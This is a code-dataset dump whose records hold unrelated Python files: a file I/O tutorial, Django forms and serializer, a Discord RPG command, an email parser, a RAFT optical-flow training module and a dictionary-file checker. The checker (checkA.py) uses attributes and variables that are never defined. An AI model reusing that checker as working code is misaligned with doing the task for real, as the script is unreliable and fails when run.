1.打开文件\n 2.读/写\n 3.关闭文件\nUTF-8编码:\n建议,文件在磁盘上保存时统一使用UTF-8编码\n在内存中,统一使用Unicode编码\n\"\"\"\nimport pickle\n\ndef 从文件中读数据():\n fp = open(\"names.txt\", \"rb\")\n #print(fp.read())\n content = fp.readlines()\n fp.seek(0)\n content2 = fp.readlines()\n print(content)\n print(content2)\n for i in content:\n print(i.decode(\"utf-8\").strip())\n fp.close()\n\n\ndef 把数据写入到文件():\n fp = open(\"地址.txt\", \"wb\")\n address = [\"中国\", \"非洲\", \"朝鲜\"]\n for i in address:\n #fp.write(i.encode(\"utf-8\")+ b'\\n')\n fp.write(\"{}\\n\".format(i).encode(\"utf-8\"))\n fp.close()\n\n\ndef write_pickle():\n dict1 = {\"name\": \"sam\", \"age\": 16}\n # fp = open(\"tmp_pickle\", 'wb')\n # pickle.dump(dict1, fp)\n # fp.close()\n\n # 优势:with上下文管理器,自动关闭已经打开的问题\n with open(\"tmp_pickle\", 'wb') as fp:\n pickle.dump(dict1, fp)\n\n\ndef read_pickle():\n fp = open(\"tmp_pickle\", 'rb')\n dict1 = pickle.load(fp)\n print(dict1)\n fp.close()\n\n\nif __name__ == \"__main__\":\n 从文件中读数据()\n #把数据写入到文件()\n #write_pickle()\n #read_pickle()","sub_path":"read_write_file.py","file_name":"read_write_file.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"302956747","text":"from django import forms\nfrom django.forms.widgets import CheckboxInput\nfrom .models import Project, Task\n\n\nclass NewTaskForm(forms.ModelForm):\n # task_done = forms.BooleanField(required=False, widget= CheckboxInput)\n\n\n class Meta:\n model = Task\n fields = [\"task_title\", \"task_content\"]\n \n\n\n\nclass NewProjectForm(forms.ModelForm):\n # task_done = forms.BooleanField(required=False, widget= CheckboxInput)\n\n\n class Meta:\n model = Project\n fields = [\"project_title\"]\n class Media:\n js = ('ckeditor/ckeditor.js',) # The , at the end of this list IS important.\n css = {\n 'all': ('ckeditor/contents.css',)\n }\n","sub_path":"todo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"96065825","text":"from handler import BaseCommand, Context, Arguments, CommandResult\n\nfrom rpg.player import Player, UnknownPlayer\nfrom utils.formatting import codeblock\n\n\nclass Command(BaseCommand):\n async def run(self, ctx: Context, args: Arguments) -> CommandResult:\n try:\n player = await Player.from_id(ctx.author.id, ctx.bot.pg)\n except UnknownPlayer:\n return \"У вас нет персонажа\"\n\n if player.inventory.size:\n inventory = \"\\n\".join(str(i) for i in player.inventory)\n else:\n inventory = \"Ваш инвентарь пуст\"\n\n equipment_item_map = [\n (slot, getattr(player.equipment, slot))\n for slot in player.equipment._slots\n ]\n\n equipment = \"\\n\".join(\n f\"{slot:>10}: {item}\" for (slot, item) in equipment_item_map\n )\n\n return codeblock(\n f\"Экипировка:\\n\\n{equipment}\\n\\nИнвентарь:\\n\\n{inventory}\"\n )\n","sub_path":"tarakania_rpg/commands/rpg/inventory/command_inventory.py","file_name":"command_inventory.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"626775693","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom translate import Translate\n\nclass Email:\n def __init__(self, name, booking_no, errand, msg):\n self.sender = name\n self.booking_no = booking_no\n self.errand = errand\n self.msg = msg\n\nclass EmailParser:\n def __init__(self, max_length=0):\n self.MAX_MESSAGE_LENGTH = max_length\n\n def set_message_max_length(self, max_length):\n self.MAX_MESSAGE_LENGTH = max_length\n\n def parse_inbox(self, inbox, qty):\n emails = []\n count = 0\n invalid = 0\n while count < qty:\n try:\n count += 1\n item = next(inbox).body\n email = self.__parse_email(item)\n if email:\n emails.append(email)\n except Exception as e:\n invalid += 1\n print('EMAIL UNREADABLE', e)\n print('{} / {} emails parsed.'.format(qty - invalid, qty))\n return emails\n\n def __clean_html(self, html_object):\n if html_object is not None:\n return re.sub('<[^<]+?>', '', html_object)\n\n def __get_element(self, table, row):\n return str(table.findAll('table')[row].findAll('tr')[0])\n\n def __has_booking_no(self, table):\n return 'Ev bokningsnummer' in self.__get_element(table, 2)\n\n def __parse_email(self, html):\n soup = BeautifulSoup(html, 'html.parser')\n table = soup.findAll('table')[0]\n name = self.__get_element(table, 1)\n booking_no = self.__get_element(table, 3) if self.__has_booking_no(table) else '~None~'\n errand = self.__get_element(table, 5) if self.__has_booking_no(table) else self.__get_element(table, 3)\n msg = self.__get_element(table, 7) if self.__has_booking_no(table) else self.__get_element(table, 5)\n\n if len(str(msg)) <= self.MAX_MESSAGE_LENGTH or self.MAX_MESSAGE_LENGTH == 0:\n return Email(\n self.__clean_html(name)[1:][:-1],\n self.__clean_html(booking_no)[1:][:-1],\n self.__clean_html(errand)[1:][:-1],\n self.__clean_html(msg)[1:][:-1]\n )\n","sub_path":"src/email_parser.py","file_name":"email_parser.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"586602652","text":"# STD\nimport os\nimport shutil\nfrom pathlib import Path\n\n# MISC\nimport numpy as np\nimport shutil\n\n# DL-framework\nimport torch\nimport torch.optim.lr_scheduler\nfrom pytorch_lightning.core.lightning import LightningModule\nfrom torchvision import transforms\nfrom torchvision.utils import make_grid\nfrom torch import from_numpy as fn\n\n# MODULES\n\nfrom src.common.utils import DotDict\nfrom raft import RAFT\nfrom src.common.visu import Visualizer\nfrom pose_estimation import full_pose_estimation\n\nfrom src.segmentation.fast_scnn import FastSCNN\nfrom src.common.rotations import so3_relative_angle\n\n\n__all__ = [\"Network\"]\n\n# exclude extremly large displacements\nMAX_FLOW = 400\nSUM_FREQ = 100\nVAL_FREQ = 5000\n# exclude extremly large displacements\nMAX_FLOW = 400\nSUM_FREQ = 100\nVAL_FREQ = 5000\n\n\ndef sequence_loss(flow_preds, flow_gt, valid, synthetic, gamma=0.8, max_flow=MAX_FLOW):\n \"\"\"Loss function defined over sequence of flow predictions\"\"\"\n\n n_predictions = len(flow_preds)\n flow_loss = 0.0\n\n # exlude invalid pixels and extremely large diplacements\n mag = torch.sum(flow_gt ** 2, dim=1).sqrt()\n valid = (valid >= 0.5) & (mag < max_flow)\n\n for i in range(n_predictions):\n i_weight = gamma ** (n_predictions - i - 1)\n i_loss = (flow_preds[i] - flow_gt).abs()\n flow_loss += i_weight * (valid[:, None] * i_loss).mean()\n\n epe = torch.sum((flow_preds[-1] - flow_gt) ** 2, dim=1).sqrt()\n epe2 = epe.clone()\n epe2 = epe2 * valid\n epe2 = epe2.sum(dim=(1, 2)) / valid.sum(dim=(1, 2))\n metrics = {}\n\n if synthetic.sum() > 0:\n metrics[\"epe_render\"] = epe2[synthetic].mean().item()\n non_synthetic = synthetic == False\n if non_synthetic.sum() > 0:\n metrics[\"epe_real\"] = epe2[non_synthetic].mean().item()\n\n epe = epe.view(-1)[valid.view(-1)]\n metrics[\"epe\"] = epe.mean().item()\n metrics[\"1px\"] = (epe < 1).float().mean().item()\n metrics[\"3px\"] = (epe < 3).float().mean().item()\n metrics[\"5px\"] = (epe < 5).float().mean().item()\n\n return flow_loss, metrics, epe2\n\n\nclass Network(LightningModule):\n def __init__(self, exp, env):\n super().__init__()\n self._exp = exp\n self._env = env\n self.hparams[\"lr\"] = self._exp[\"lr\"]\n\n self.model = RAFT(args=DotDict(self._exp[\"model\"][\"args\"]))\n\n self._mode = \"train\"\n self._logged_images = {\"train\": 0, \"val\": 0, \"test\": 0}\n\n if \"logged_images_max\" in self._exp.keys():\n self._logged_images_max = self._exp[\"logged_images_max\"]\n else:\n self._logged_images_max = {\"train\": 2, \"val\": 2, \"test\": 2}\n\n self._type = (\n torch.float16 if exp[\"trainer\"].get(\"precision\", 32) == 16 else torch.float32\n )\n self._visu = Visualizer(\n os.path.join(exp[\"name\"], \"visu\"), num_classes=2, store=False\n )\n\n if self._exp.get(\"mode\", \"train\") == \"test\":\n self._estimate_pose = True\n # SEGMENTATION\n self.seg = FastSCNN(**self._exp[\"seg\"][\"cfg\"])\n self.output_transform_seg = transforms.Compose(\n [\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ]\n )\n else:\n self._estimate_pose = False\n\n self._count_real = {\"train\": 0, \"val\": 0, \"test\": 0}\n self._count_render = {\"train\": 0, \"val\": 0, \"test\": 0}\n\n shutil.rmtree(\"/home/jonfrey/tmp/ycb\", ignore_errors=True)\n\n def forward(self, batch, **kwargs):\n image1 = batch[0]\n image2 = batch[1]\n flow_predictions = self.model(image1, image2, iters=self._exp[\"model\"][\"iters\"])\n\n self.plot(batch[2], flow_predictions, image1, image2, batch[3])\n return flow_predictions\n\n def on_train_epoch_start(self):\n\n self._visu.logger = self.logger\n self._mode = \"train\"\n\n def on_train_start(self):\n pass\n\n def on_epoch_start(self):\n # RESET IMAGE COUNT\n for k in self._logged_images.keys():\n self._logged_images[k] = 0\n self._visu.epoch = self.trainer.current_epoch\n self.log(\"current_epoch\", self.trainer.current_epoch)\n self.log(\"gloabal_step\", self.trainer.global_step)\n\n def training_step(self, batch, batch_idx):\n \"\"\"\n img1 0-255 BS,C,H,W\n img2 0-255 BS,C,H,W\n flow BS,2,H,W max [-155 263]\n valid 0 or 1\n\n flow_predictons is a list len(flow_predictions) = iters , flow_predictions[0].shape == flow.shape\n \"\"\"\n self.log(\n \"learning_rate\", float(self.trainer.lr_schedulers[0][\"scheduler\"].get_lr()[0])\n )\n BS = batch[0].shape[0]\n flow = batch[2]\n valid = batch[3]\n synthetic = batch[4]\n flow_predictions = self(batch=batch)\n\n loss, metrics, epe_per_object = sequence_loss(\n flow_predictions, flow, valid, synthetic, self._exp[\"model\"][\"gamma\"]\n )\n\n if self._estimate_pose:\n # PRED FLOW\n inp = torch.cat(\n [\n self.output_transform_seg(batch[0] / 255.0),\n self.output_transform_seg(batch[1] / 255.0),\n ],\n dim=1,\n )\n outputs = self.seg(inp)\n probs = torch.nn.functional.softmax(outputs[0], dim=1)\n pred_valid = torch.argmax(probs, dim=1)\n acc = (pred_valid == valid).sum() / torch.numel(valid)\n (\n h_gt,\n h_render,\n h_init,\n bb,\n idx,\n K_ren,\n K_real,\n render_d,\n model_points,\n img_real_ori,\n p,\n ) = batch[5:]\n\n # ESTIMATE POSE\n (\n res_dict,\n count_invalid,\n h_pred__pred_pred,\n ratios,\n valid_res,\n ) = full_pose_estimation(\n h_gt=h_gt.clone(),\n h_render=h_render.clone(),\n h_init=h_init.clone(),\n bb=bb,\n flow_valid=pred_valid.clone(),\n flow_pred=flow_predictions[-1].clone(),\n idx=idx.clone(),\n K_ren=K_ren,\n K_real=K_real,\n render_d=render_d.clone(),\n model_points=model_points.clone(),\n cfg=self._exp[\"eval_cfg\"].get(\"full_pose_estimation\", {}),\n )\n try:\n self.count_suc += BS - count_invalid\n self.count_failed += count_invalid\n except:\n self.count_suc = BS - count_invalid\n self.count_failed = count_invalid\n\n self.log(f\"acc_mask\", acc.item(), on_step=True, on_epoch=True)\n\n index_key = str(int(idx))\n self.log(\n f\"inital_trans_error_obj\" + index_key,\n (torch.norm(h_gt[0, :3, 3] - h_init[0, :3, 3])).item(),\n on_step=True,\n on_epoch=True,\n )\n self.log(\n f\"inital_rotation_error_obj\" + index_key,\n (\n so3_relative_angle(\n h_gt[:, :3, :3].type(torch.float32), h_init[:, :3, :3].type(torch.float32)\n )\n / np.math.pi\n * 180\n ).item(),\n on_step=True,\n on_epoch=True,\n )\n\n self.log(\n f\"inital_trans_error\",\n torch.norm(h_gt[0, :3, 3] - h_init[0, :3, 3]).item(),\n on_step=True,\n on_epoch=True,\n )\n self.log(\n f\"inital_rotation_error\",\n (\n so3_relative_angle(\n h_gt[:, :3, :3].type(torch.float32), h_init[:, :3, :3].type(torch.float32)\n )\n / np.math.pi\n * 180\n ).item(),\n on_step=True,\n on_epoch=True,\n )\n\n if len(res_dict) > 0:\n self.log(f\"ransac_inlier_ratio\", float(ratios[0]), on_step=False, on_epoch=True)\n # STORE PREDICTIONS\n tmp = os.path.join(\n self._exp[\"name\"], p[0][p[0].find(\"ycb\") :], str(int(idx[0]) + 1) + \".npy\"\n )\n tmp2 = os.path.join(\n \"/home/jonfrey/tmp\", p[0][p[0].find(\"ycb\") :], str(int(idx[0]) + 1) + \".npy\"\n )\n Path(tmp).parent.mkdir(parents=True, exist_ok=True)\n np.save(str(tmp), h_pred__pred_pred[0].cpu().numpy())\n Path(tmp2).parent.mkdir(parents=True, exist_ok=True)\n np.save(str(tmp2), h_pred__pred_pred[0].cpu().numpy())\n\n index_key = str(int(idx))\n self.log(f\"acc_mask_obj\" + index_key, acc.item(), on_step=True, on_epoch=True)\n\n self.log(\n f\"adds_init_obj\" + index_key,\n res_dict[\"adds_h_init\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n self.log(\n f\"add_s_init_obj\" + index_key,\n res_dict[\"add_s_h_init\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n\n self.log(\n f\"adds_obj\" + index_key,\n res_dict[\"adds_h_pred\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n self.log(\n f\"add_s_obj\" + index_key,\n res_dict[\"add_s_h_pred\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n self.plot_pose(\n model_points=model_points,\n h_gt=h_gt,\n h_init=h_init,\n h_pred=h_pred__pred_pred,\n pred_valid=pred_valid,\n img_real_zoom=batch[0],\n img_real_ori=img_real_ori,\n K_real=K_real,\n index=batch_idx,\n )\n else:\n print(\"Count SUC\", self.count_suc, \" Count FAILED\", self.count_failed)\n # print(\"Force PLOT since Pose Estimation vailed!\")\n # self.plot( batch[2], flow_predictions, batch[0], batch[1], pred_valid, force =True, index = batch_idx)\n # self.plot_seg ( batch[0], batch[1], pred_valid, valid,force = True, index = batch_idx )\n\n if batch_idx % 50 == 0:\n self.log(f\"count_suc\", self.count_suc, on_step=True, on_epoch=False)\n self.log(f\"count_failed\", self.count_failed, on_step=True, on_epoch=False)\n\n for k in res_dict.keys():\n # print( \"k \", k, \" res_dict \", res_dict[k] ,\" value \", res_dict[k].mean())\n self.log(\n f\"{self._mode}_{k}_pred_flow_pred_seg\",\n res_dict[k].mean().item(),\n on_step=True,\n on_epoch=False,\n prog_bar=False,\n )\n\n if False:\n # GT FLOW GT SEG\n res_dict, count_invalid, h_pred__gt_gt = full_pose_estimation(\n h_gt=h_gt.clone(),\n h_render=h_render.clone(),\n h_init=h_init.clone(),\n bb=bb,\n flow_valid=valid.clone(),\n flow_pred=flow.clone(),\n idx=idx.clone(),\n K_ren=K_ren,\n K_real=K_real,\n render_d=render_d.clone(),\n model_points=model_points.clone(),\n cfg=self._exp[\"eval_cfg\"].get(\"full_pose_estimation\", {}),\n )\n for k in res_dict.keys():\n self.log(\n f\"{self._mode}_{k}_gt_flow_gt_seg\",\n res_dict[k].mean(),\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n\n # PRED FLOW GT SEG\n (\n h_gt,\n h_render,\n h_init,\n bb,\n idx,\n K_ren,\n K_real,\n render_d,\n model_points,\n img_real_ori,\n p,\n ) = batch[5:]\n res_dict, count_invalid, h_pred__pred_gt = full_pose_estimation(\n h_gt=h_gt.clone(),\n h_render=h_render.clone(),\n h_init=h_init.clone(),\n bb=bb,\n flow_valid=valid.clone(),\n flow_pred=flow_predictions[-1].clone(),\n idx=idx.clone(),\n K_ren=K_ren,\n K_real=K_real,\n render_d=render_d.clone(),\n model_points=model_points.clone(),\n cfg=self._exp[\"eval_cfg\"].get(\"full_pose_estimation\", {}),\n )\n for k in res_dict.keys():\n self.log(\n f\"{self._mode}_{k}_pred_flow_gt_seg\",\n res_dict[k].mean(),\n on_step=True,\n on_epoch=True,\n prog_bar=False,\n )\n\n else:\n idx = batch[5]\n bb = batch[6] # list containing tensors for [real_tl ,real_br, ren_tl, ren_br ]\n\n logging_metrices = [\"epe\", \"epe_real\", \"epe_render\"]\n for met in logging_metrices:\n if met in metrics:\n self.log(\n f\"{self._mode}_{met}\",\n metrics[met],\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n\n if self._exp.get(\"log\", {}).get(\"individual_obj\", {}).get(self._mode, False):\n for i in range(BS):\n obj = str(int(idx[i]))\n # real_tl ,real_br, ren_tl, ren_br\n tl = bb[0][i]\n br = bb[1][i]\n\n _w = br[1] - tl[1]\n _h = br[0] - tl[0]\n\n # r1 and r2 should be equal up to discretization errors\n r1 = 480 / _h\n r2 = 640 / _w\n r = (r1 + r2) / 2\n if synthetic[i]:\n self.log(\n f\"{self._mode}_render_norm_obj{obj}\",\n epe_per_object[i].float().item() / r,\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n self.log(\n f\"{self._mode}_render_obj{obj}\",\n epe_per_object[i].float().item(),\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n else:\n self.log(\n f\"{self._mode}_real_norm_obj{obj}\",\n epe_per_object[i].float().item() / r,\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n self.log(\n f\"{self._mode}_real_obj{obj}\",\n epe_per_object[i].float().item(),\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n\n self._count_real[self._mode] += (synthetic == False).sum()\n self._count_render[self._mode] += (synthetic).sum()\n\n self.log(\n f\"{self._mode}_count_real\",\n self._count_real[self._mode],\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n self.log(\n f\"{self._mode}_count_render\",\n self._count_render[self._mode],\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n\n return {\"loss\": loss, \"pred\": flow_predictions, \"target\": flow}\n\n def plot_pose(\n self,\n model_points,\n h_gt,\n h_init,\n h_pred,\n pred_valid,\n img_real_zoom,\n img_real_ori,\n K_real,\n index=0,\n ):\n if self._logged_images[self._mode] < self._logged_images_max[self._mode]:\n b = 0\n img_gt = self._visu.plot_estimated_pose(\n img=img_real_ori[b].cpu().numpy(),\n points=model_points[b].cpu(),\n H=h_gt[b].cpu(),\n K=K_real[b].cpu(),\n tag=\"Test_gt\",\n epoch=index,\n not_log=True,\n store=False,\n )\n img_pred = self._visu.plot_estimated_pose(\n img=img_real_ori[b].cpu().numpy(),\n points=model_points[b].cpu(),\n H=h_pred[b].cpu(),\n K=K_real[b].cpu(),\n tag=\"Test_pred\",\n epoch=index,\n not_log=True,\n store=False,\n )\n img_init = self._visu.plot_estimated_pose(\n img=img_real_ori[b].cpu().numpy(),\n points=model_points[b].cpu(),\n H=h_init[b].cpu(),\n K=K_real[b].cpu(),\n tag=\"Test_init\",\n not_log=True,\n store=False,\n )\n\n ass = np.concatenate([img_init, img_pred, img_gt], axis=1)\n print(ass.shape)\n self._visu.plot_image(img=ass, tag=\"Pose_INIT_PRED_GT\", epoch=index, store=False)\n\n def plot(self, flow_gt, flow_pred, img1, img2, valid, force=False):\n if self._logged_images[self._mode] < self._logged_images_max[self._mode] or force:\n\n for flow, name in zip([flow_gt, flow_pred[-1]], [\"gt\", \"pred\"]):\n corros = []\n for b in range(img1.shape[0]):\n\n i1 = img1[b].permute(1, 2, 0)\n i2 = img2[b].permute(1, 2, 0)\n va = valid[b]\n fl = flow[b].permute(1, 2, 0)\n corros.append(\n fn(\n self._visu.plot_corrospondence(\n fl[:, :, 0],\n fl[:, :, 1],\n va,\n i1,\n i2,\n colorful=True,\n text=False,\n res_h=30,\n res_w=30,\n min_points=50,\n jupyter=False,\n not_log=True,\n )\n )\n )\n\n res = torch.stack(corros).permute(0, 3, 1, 2)\n img = make_grid(res, nrow=2, padding=5)\n idx = self._logged_images[self._mode]\n\n nr = self._logged_images[self._mode] + self.trainer.current_epoch * (\n self._logged_images_max[self._mode] + 1\n )\n self._visu.plot_image(\n img=img, tag=f\"Flow_{self._mode}_{name}\", epoch=nr, store=False\n )\n self._logged_images[self._mode] += 1\n\n def plot_seg(\n self, ori_real, ori_render, pred, target, force=False, idx=None, index=0\n ):\n if self._logged_images[self._mode] < self._logged_images_max[self._mode] or force:\n BS = pred.shape[0]\n rows = int(BS ** 0.5)\n grid_target = make_grid(\n target[:, None].repeat(1, 3, 1, 1),\n nrow=rows,\n padding=2,\n scale_each=False,\n pad_value=2,\n )\n grid_pred = make_grid(\n pred[:, None].repeat(1, 3, 1, 1),\n nrow=rows,\n padding=2,\n scale_each=False,\n pad_value=2,\n )\n\n grid_ori_real = make_grid(\n ori_real, nrow=rows, padding=2, scale_each=False, pad_value=0\n )\n grid_ori_render = make_grid(\n ori_render, nrow=rows, padding=2, scale_each=False, pad_value=0\n )\n\n self._visu.plot_detectron(\n img=grid_ori_real,\n label=grid_pred[0, :, :],\n tag=\"PRED SEG\",\n method=\"left\",\n store=False,\n )\n self._visu.plot_image(\n img=grid_ori_render,\n tag=\"Segmentation_left_pred__right_render_img\",\n method=\"right\",\n epoch=index,\n store=False,\n )\n\n self._visu.plot_detectron(\n img=grid_ori_real,\n label=grid_pred[0, :, :],\n tag=\"PRED SEG\",\n method=\"left\",\n store=False,\n )\n self._visu.plot_detectron(\n img=grid_ori_real,\n label=grid_target[0, :, :],\n tag=\"Segmentation_left_pred__right_gt\",\n method=\"right\",\n epoch=index,\n store=False,\n )\n\n def training_step_end(self, outputs):\n # Log replay buffer stats\n self.log(\"train_loss\", outputs[\"loss\"], on_step=False, on_epoch=True, prog_bar=True)\n return {\"loss\": outputs[\"loss\"]}\n\n def validation_step(self, batch, batch_idx, dataloader_idx=0):\n return self.training_step(batch, batch_idx)\n\n def validation_step_end(self, outputs):\n self.log(\"val_loss\", outputs[\"loss\"], on_step=False, on_epoch=True, prog_bar=True)\n\n def on_validation_epoch_start(self):\n self._mode = \"val\"\n\n def validation_epoch_end(self, outputs):\n pass\n\n def configure_optimizers(self):\n if self._exp[\"optimizer\"][\"name\"] == \"ADAM\":\n optimizer = torch.optim.Adam(\n [{\"params\": self.model.parameters()}], lr=self.hparams[\"lr\"]\n )\n elif self._exp[\"optimizer\"][\"name\"] == \"SGD\":\n optimizer = torch.optim.SGD(\n [{\"params\": self.model.parameters()}],\n lr=self.hparams[\"lr\"],\n **self._exp[\"optimizer\"][\"sgd_cfg\"],\n )\n elif self._exp[\"optimizer\"][\"name\"] == \"WADAM\":\n optimizer = torch.optim.AdamW(\n self.model.parameters(),\n lr=self.hparams[\"lr\"],\n **self._exp[\"optimizer\"][\"wadam_cfg\"],\n )\n\n else:\n raise Exception(\"Optimizer name not defined\")\n\n if self._exp.get(\"lr_scheduler\", {}).get(\"active\", False):\n if self._exp[\"lr_scheduler\"][\"name\"] == \"POLY\":\n # polynomial lr-scheduler\n init_lr = self.hparams[\"lr\"]\n max_epochs = self._exp[\"lr_scheduler\"][\"poly_cfg\"][\"max_epochs\"]\n target_lr = self._exp[\"lr_scheduler\"][\"poly_cfg\"][\"target_lr\"]\n power = self._exp[\"lr_scheduler\"][\"poly_cfg\"][\"power\"]\n lambda_lr = (\n lambda epoch: (\n ((max_epochs - min(max_epochs, epoch)) / max_epochs) ** (power)\n )\n + (1 - (((max_epochs - min(max_epochs, epoch)) / max_epochs) ** (power)))\n * target_lr\n / init_lr\n )\n scheduler = torch.optim.lr_scheduler.LambdaLR(\n optimizer, lambda_lr, last_epoch=-1, verbose=True\n )\n elif self._exp[\"lr_scheduler\"][\"name\"] == \"OneCycleLR\":\n num_steps = self._exp[\"lr_scheduler\"][\"onecyclelr_cfg\"][\"num_steps\"]\n\n scheduler = torch.optim.lr_scheduler.OneCycleLR(\n optimizer,\n max_lr=self.hparams[\"lr\"],\n total_steps=num_steps + 100,\n pct_start=self._exp[\"lr_scheduler\"][\"onecyclelr_cfg\"].get(\"pct_start\", 0.05),\n cycle_momentum=False,\n anneal_strategy=\"linear\",\n )\n\n lr_scheduler = {\"scheduler\": scheduler, \"interval\": \"step\"}\n\n ret = {\"optimizer\": optimizer, \"lr_scheduler\": lr_scheduler}\n else:\n ret = [optimizer]\n return ret\n","sub_path":"src/flow/lightning/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":20379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"216186160","text":"#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nCheck A0000001.txt.\r\n\"\"\"\r\n\r\nimport os\r\nimport sys\r\nimport re\r\nimport codecs\r\n\r\nimport CheckLog\r\nlog = CheckLog.get_file_log(r'checkA.log')\r\n\r\nclass DicItemA:\r\n\tdef __init__(self, s):\r\n\t\ts = s.strip()\r\n\t\tself._linestr = s\r\n\t\tpat = re.match( \\\r\n\t\t\t\tr'^(\\S+)\\t([\\w ]+)\\t(0x[\\dA-F]{4})\\t(0x[\\dA-F]{4})\\t(0x[\\dA-F]{8})$', \\\r\n\t\t\t\tself._linestr)\r\n\t\tif not pat:\r\n\t\t\tlog.warning(r' : %s : %s', self.get_father()['nextLevelId'], self.get_str())\r\n\t\t\treturn\r\n\t\tself._name = pat.group(1)\r\n\t\tself._pinyin = pat.group(2)\r\n\t\tself._minKiwiId = pat.group(3)\r\n\t\tself._maxKiwiId = pat.group(4)\r\n\t\tself._num0 = pat.group(5)\r\n\t\t\r\n\tdef get_str(self):\r\n\t\treturn self._linestr\r\n\t\r\n\tdef __getitem__(self, attr):\r\n\t\tif attr == 'name':\r\n\t\t\treturn self._name\r\n\t\telif attr == 'pinyin':\r\n\t\t\treturn self._pinyin\r\n\t\telif attr == 'minKiwiId':\r\n\t\t\treturn self._minKiwiId\r\n\t\telif attr == 'maxKiwiId':\r\n\t\t\treturn self._maxKiwiId\r\n\t\telif attr == 'num0':\r\n\t\t\treturn self._num0\r\n\t\telse:\r\n\t\t\traise KeyError()\r\n\t\t\r\n\tdef check(self):\r\n\t\t\"\"\" Check the item itself only.\r\n\t\t\"\"\"\r\n\t\tchecker = DicItemAChecker(self)\r\n\t\tr = checker.check()\r\n\t\tif not r:\r\n\t\t\tlog.warning(r' : %s', self.get_str())\r\n\t\treturn r\r\n\t\r\nclass DicItemAChecker():\r\n\tpinyinChars = set(u'abcdefghijklmnopqrstuvwxyz /1234')\r\n\t\r\n\tdef __init__(self, item):\r\n\t\tself._item = item\r\n\t\t\r\n\tdef check(self):\r\n\t\tr1 = self._check_1()\r\n\t\tr2 = self._check_2()\r\n\t\treturn r1 and r2\r\n\t\r\n\tdef _check_1(self):\r\n\t\t\"\"\"Check encoding, which is checked in function check().\r\n\t\t\"\"\"\r\n\t\treturn True\r\n\t\r\n\tdef _check_2(self):\r\n\t\t\"\"\"Check pinyin.\r\n\t\t\"\"\"\r\n\t\td = self._dicItem\r\n\t\tr1 = self._check_2_1()\r\n\t\tr2 = self._check_2_2();\r\n\t\tif not r1:\r\n\t\t\tlog.info(r' Alphabet text but not NoPinYin : %s', self._dicItem.get_str())\r\n\t\t\treturn False\r\n\t\tif not r2:\r\n\t\t\tlog.info(r' Pinyin contains other characters : %s', self._dicItem.get_str())\r\n\t\t\treturn False\r\n\t\treturn True\r\n\t\r\n\tdef _check_2_1(self):\r\n\t\t\"\"\"Check if text has alphabet, then pinyin should be \"NoPinYin\".\r\n\t\t\"\"\"\r\n\t\tdef has_alphabet(s):\r\n\t\t\tfor c in s:\r\n\t\t\t\tif c in self.alphabets:\r\n\t\t\t\t\treturn True\r\n\t\t\treturn False\r\n\t\tif has_alphabet(self._dicItem['name']):\r\n\t\t\tif self._dicItem['pinyin'] != u'NoPinYin':\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\t\r\n\tdef _check_2_2(self):\r\n\t\t\"\"\"Check characters in pinyin.\r\n\t\t\"\"\"\r\n\t\tpinyin = self._dicItem['pinyin']\r\n\t\tif pinyin == 'NoPinYin':\r\n\t\t\treturn True\r\n\t\tfor c in pinyin:\r\n\t\t\tif not c in self.pinyinChars:\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\t\r\ndef check(filename):\r\n\t\"\"\"Check records in file.\r\n\t\"\"\"\r\n\tf = codecs.open(filename, 'r', 'gbk')\r\n\ttry:\r\n\t\tls = f.readlines()\r\n\texcept:\r\n\t\tlog.info(r' Contain non-GBK character : %s', self._dicItem.get_str())\r\n\t\treturn False\r\n\trds = tuple(DicItemA(line) for line in ls)\r\n\tr = tuple(r.check() for r in rds)\r\n\treturn all(r)\r\n\r\ndef main():\r\n\tif len(sys.argv) != 2:\r\n\t\tprint('Usage:')\r\n\t\tprint(r'python check.py [Filepath of A000000.txt]')\r\n\t\tsys.exit(0)\r\n\tfilename = sys.argv[1]\r\n\tcheck(filename)","sub_path":"pycode/checkA.py","file_name":"checkA.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"480418731","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import serializers\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom core.models import Student, Professor, Institute, FieldOfStudies, Course\n\n\nclass UserRegistrationSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for user registration or creation\"\"\"\n tokens = serializers.SerializerMethodField()\n\n class Meta:\n \"\"\"Meta class for User registration serializer\"\"\"\n model = get_user_model()\n fields = ('email',\n 'password',\n 'id',\n 'name',\n 'is_professor',\n 'is_student',\n 'user_image',\n 'tokens',\n 'avatar_num')\n extra_kwargs = {'password': {'write_only': True, 'min_length': 6}}\n\n def get_tokens(self, user):\n \"\"\"Returns tokens for token authentication\"\"\"\n refresh = RefreshToken.for_user(user)\n return {\n 'refresh': str(refresh),\n 'access': str(refresh.access_token),\n 